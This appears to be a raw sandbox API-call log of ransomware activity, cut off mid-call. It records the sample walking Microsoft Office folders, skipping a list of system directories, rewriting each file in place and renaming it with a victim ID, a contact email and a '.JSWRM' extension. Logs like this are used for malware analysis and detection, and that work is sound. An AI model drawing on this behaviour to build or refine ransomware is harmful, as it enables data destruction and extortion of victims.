0x22d260 [0122.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXT", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXT", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_COL.HXT", lpUsedDefaultChar=0x0) returned 17 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0122.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.416] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=209) returned 1 [0122.416] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0122.416] ReadFile (in: hFile=0x238, lpBuffer=0x22f6c0, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22f6c0*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0122.438] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.439] WriteFile (in: hFile=0x238, lpBuffer=0x22f6c0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22f6c0*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0122.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0122.439] CloseHandle (hObject=0x238) returned 1 [0122.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0122.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0122.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0122.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0122.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0122.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.439] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0122.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.441] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_PRM_F_COL.HXK", cAlternateFileName="VISIO_~3.HXK")) returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2=".") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="..") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="...") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="windows") returned -1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="recovery") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="perflogs") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="documents and settings") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="system volume information") returned 1 [0122.441] lstrcmpiW (lpString1="VISIO_PRM_F_COL.HXK", lpString2="msocache") returned 1 [0122.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0122.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_F_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_F_COL.HXK", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_F_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0122.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0122.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.442] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0122.442] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0122.442] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.443] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.443] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0122.443] CloseHandle (hObject=0x238) returned 1 [0122.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0122.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0122.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0122.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0122.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0122.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.444] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0122.445] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_PRM_K_COL.HXK", cAlternateFileName="VISIO_~4.HXK")) returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2=".") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="..") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="...") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="windows") returned -1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="recovery") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="perflogs") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="documents and settings") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="system volume information") returned 1 [0122.445] lstrcmpiW (lpString1="VISIO_PRM_K_COL.HXK", lpString2="msocache") returned 1 [0122.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0122.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x241010, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_K_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_K_COL.HXK", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_K_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0122.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0122.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0122.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.446] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0122.446] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0122.446] ReadFile (in: hFile=0x238, lpBuffer=0x209530, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.447] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.447] WriteFile (in: hFile=0x238, lpBuffer=0x209530*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0122.447] CloseHandle (hObject=0x238) returned 1 [0122.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0122.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0122.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0122.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0122.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0122.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0122.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0122.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0122.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0122.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0122.448] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x290acd1, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x290acd1, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4855a5d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x4b7ac, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_STD.HXS", cAlternateFileName="VISIO_~1.HXS")) returned 1 [0122.448] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2=".") returned 1 [0122.448] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="..") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="...") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="windows") returned -1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="recovery") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="perflogs") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="documents and settings") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="$RECYCLE.BIN") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="system volume information") returned 1 [0122.449] lstrcmpiW (lpString1="VISIO_STD.HXS", lpString2="msocache") returned 1 [0122.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0122.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD.HXS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD.HXS", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_STD.HXS", lpUsedDefaultChar=0x0) returned 13 [0122.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0122.449] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0122.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_STD.HXS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.449] WideCharToMultiByte (in: CodePage=0xfde9, 